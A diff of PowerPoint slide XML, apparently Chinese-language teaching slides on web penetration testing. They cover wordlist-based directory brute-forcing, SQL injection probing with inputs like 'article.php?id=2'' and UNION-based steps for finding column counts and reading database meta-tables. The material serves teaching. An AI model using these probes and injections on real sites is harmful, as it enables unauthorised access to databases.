+              <a:t>服务器</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
+              <a:t>页面</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>下面的命令可以运行来检测远程文件和目录</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
+              <a:t>：</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="3" name="图片 2"/>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId2"/>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1227800" y="3176478"/>
+            <a:ext cx="9147309" cy="563009"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
+      <p:cxnSp>
+        <p:nvCxnSpPr>
+          <p:cNvPr id="8" name="直接箭头连接符 7"/>
+          <p:cNvCxnSpPr/>
+          <p:nvPr/>
+        </p:nvCxnSpPr>
+        <p:spPr>
+          <a:xfrm flipV="1">
+            <a:off x="3057099" y="3616657"/>
+            <a:ext cx="204716" cy="696036"/>
+          </a:xfrm>
+          <a:prstGeom prst="straightConnector1">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:ln>
+            <a:tailEnd type="triangle"/>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:lnRef>
+          <a:fillRef idx="0">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="0">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="tx1"/>
+          </a:fontRef>
+        </p:style>
+      </p:cxnSp>
+      <p:cxnSp>
+        <p:nvCxnSpPr>
+          <p:cNvPr id="10" name="直接箭头连接符 9"/>
+          <p:cNvCxnSpPr/>
+          <p:nvPr/>
+        </p:nvCxnSpPr>
+        <p:spPr>
+          <a:xfrm flipH="1" flipV="1">
+            <a:off x="4885899" y="3616657"/>
+            <a:ext cx="27295" cy="1758876"/>
+          </a:xfrm>
+          <a:prstGeom prst="straightConnector1">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:ln>
+            <a:tailEnd type="triangle"/>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:lnRef>
+          <a:fillRef idx="0">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="0">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="tx1"/>
+          </a:fontRef>
+        </p:style>
+      </p:cxnSp>
+      <p:cxnSp>
+        <p:nvCxnSpPr>
+          <p:cNvPr id="12" name="直接箭头连接符 11"/>
+          <p:cNvCxnSpPr/>
+          <p:nvPr/>
+        </p:nvCxnSpPr>
+        <p:spPr>
+          <a:xfrm flipV="1">
+            <a:off x="5854890" y="3616657"/>
+            <a:ext cx="1555845" cy="1146412"/>
+          </a:xfrm>
+          <a:prstGeom prst="straightConnector1">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:ln>
+            <a:tailEnd type="triangle"/>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:lnRef>
+          <a:fillRef idx="0">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="0">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="tx1"/>
+          </a:fontRef>
+        </p:style>
+      </p:cxnSp>
+      <p:cxnSp>
+        <p:nvCxnSpPr>
+          <p:cNvPr id="15" name="直接箭头连接符 14"/>
+          <p:cNvCxnSpPr/>
+          <p:nvPr/>
+        </p:nvCxnSpPr>
+        <p:spPr>
+          <a:xfrm flipH="1" flipV="1">
+            <a:off x="9007522" y="3616657"/>
+            <a:ext cx="40943" cy="696036"/>
+          </a:xfrm>
+          <a:prstGeom prst="straightConnector1">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:ln>
+            <a:tailEnd type="triangle"/>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:lnRef>
+          <a:fillRef idx="0">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="0">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="tx1"/>
+          </a:fontRef>
+        </p:style>
+      </p:cxnSp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="16" name="文本框 15"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="2442949" y="4312693"/>
+            <a:ext cx="1228299" cy="369332"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" rtlCol="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
+              <a:t>输出颜色</a:t>
+            </a:r>
+            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="17" name="文本框 16"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1951630" y="5375533"/>
+            <a:ext cx="7579254" cy="369332"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="none" rtlCol="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
+              <a:t>使用文件</a:t>
+            </a:r>
             <a:r>
               <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-              <a:t>	</a:t>
+              <a:t>wordlists/general/big.txt</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>作为一个“蛮力”的</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
-              <a:t>使用</a:t>
+              <a:t>字典远程</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>目录的名称</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="19" name="文本框 18"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="5400422" y="4925157"/>
+            <a:ext cx="5181227" cy="369332"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="none" rtlCol="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
+              <a:t>如果</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>响应</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
+              <a:t>代码是</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-              <a:t>UNION</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>UNION</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>是将两个查询语句的结果合并起来。</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>UNION</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>连接的两个查询结果</a:t>
+              <a:t>404</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
-              <a:t>。</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>查询语句的前面部分我们无法修改，因为这些是</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>PHP</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>中的代码。然而，我们可以利用</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>UNION</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>尝试其它表格的信息</a:t>
+              <a:t>表示忽略</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>响应（页面未找到</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
-              <a:t>。</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>一个重要的</a:t>
-            </a:r>
+              <a:t>）</a:t>
+            </a:r>
+            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="21" name="文本框 20"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="6605518" y="4393737"/>
+            <a:ext cx="5585684" cy="369332"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" rtlCol="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
             <a:r>
               <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
-              <a:t>规则：</a:t>
+              <a:t>通过在</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>字典中找到的每一个值替换</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
+              <a:t>在</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-              <a:t>UNION</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>连接的两个查询语句必须查询相等数量的列，否则将出错</a:t>
+              <a:t>URL</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
-              <a:t>。</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buNone/>
-            </a:pPr>
-            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
-          </a:p>
-          <a:p>
+              <a:t>中</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>的</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
+              <a:t>单词</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+              <a:t>FUZZ</a:t>
+            </a:r>
             <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
           </a:p>
         </p:txBody>
@@ -6710,7 +6928,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3201757849"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3494945372"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -6792,159 +7010,37 @@
           </a:xfrm>
         </p:spPr>
         <p:txBody>
-          <a:bodyPr>
-            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
-          </a:bodyPr>
+          <a:bodyPr/>
           <a:lstStyle/>
           <a:p>
             <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>3.</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>利用</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>UNION</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>开发</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-              <a:t>	a</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>.</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>利用</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>UNION</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>试探出列的数量</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-              <a:t>	b</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>.</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>找出显示的列</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-              <a:t>	c</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>.</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>尝试出数据库</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>meta-tables</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>中的信息</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-              <a:t>	d</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>.</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>尝试出其它数据库或表中的信息</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-              <a:t>A. </a:t>
-            </a:r>
-            <a:r>
               <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
-              <a:t>有</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>两种方法可以试出列的</a:t>
+              <a:t>嗅</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>探</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
-              <a:t>数量</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>	</a:t>
-            </a:r>
+              <a:t>：</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
+          </a:p>
+          <a:p>
             <a:r>
               <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
-              <a:t>使用</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>UNION SELECT </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>和增加列的数量</a:t>
+              <a:t>猜想</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>服务器上脚本</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>整型参数试探</a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -6956,19 +7052,140 @@
               <a:t>	</a:t>
             </a:r>
             <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>/</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>article.php?id</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>=2'</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>  如果报错语法错误，说明存在</a:t>
+            </a:r>
+            <a:r>
               <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
-              <a:t>使用</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>ORDER BY</a:t>
-            </a:r>
+              <a:t>漏洞</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
           </a:p>
           <a:p>
             <a:pPr marL="0" indent="0">
               <a:buNone/>
             </a:pPr>
-            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+              <a:t>	/</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>article.php?id</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>=2-1 </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>不报错，如果显示是</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>1</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>图则存在漏洞</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>字符型参数</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
+              <a:t>试探</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+              <a:t>	</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
+              <a:t>如果</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>加</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>1</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>个  </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>'</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>   将报错</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+              <a:t>	</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
+              <a:t>如果加</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+              <a:t>2</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
+              <a:t>个 </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>  </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>'</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>   </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
+              <a:t>不</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>报错</a:t>
+            </a:r>
           </a:p>
           <a:p>
             <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
@@ -6978,7 +7195,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3260897345"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1119901166"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -7055,36 +7272,48 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="913774" y="1850834"/>
-            <a:ext cx="10698004" cy="3940365"/>
+            <a:off x="913149" y="1509640"/>
+            <a:ext cx="10698004" cy="4468079"/>
           </a:xfrm>
         </p:spPr>
         <p:txBody>
           <a:bodyPr>
-            <a:normAutofit/>
+            <a:normAutofit lnSpcReduction="10000"/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>源语句如下：</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
             <a:pPr marL="0" indent="0">
               <a:buNone/>
             </a:pPr>
             <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
+              <a:t>开发</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>SQL</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>注入</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
+              <a:t>漏洞：</a:t>
+            </a:r>
+            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
+              <a:t>使用</a:t>
+            </a:r>
+            <a:r>
               <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-              <a:t>	SELECT </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>id,name,price</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t> FROM articles where id=1</a:t>
+              <a:t>UNION</a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -7092,148 +7321,56 @@
               <a:buNone/>
             </a:pPr>
             <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>UNION</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>是将两个查询语句的结果合并起来。</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>UNION</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>连接的两个查询结果</a:t>
+            </a:r>
+            <a:r>
               <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
-              <a:t>尝试</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>   </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>SELECT </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>id,name,price</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t> FROM articles where id=1 UNION SELECT </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-              <a:t>1—— </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx2"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>[</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx2"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>将</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx2"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>报</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx2"/>
